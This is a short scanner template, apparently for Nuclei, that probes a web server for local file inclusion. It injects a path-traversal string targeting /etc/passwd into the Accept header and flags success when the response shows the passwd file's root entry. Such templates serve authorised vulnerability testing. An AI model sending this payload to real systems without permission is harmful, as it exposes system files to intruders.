id: header-lfi-accept-injection

info:
  name: Header LFI via Accept Header
  author: _abdellhalim
  description: |
    Attempts to exploit LFI vulnerability via Accept header injection.
  tags: lfi,header,injection,file-disclosure

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      Accept: "../../../../../../../../../../../../../../../../etc/passwd{{"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root:x:0:0:"
        condition: contains

      - type: status
        status:
          - 200
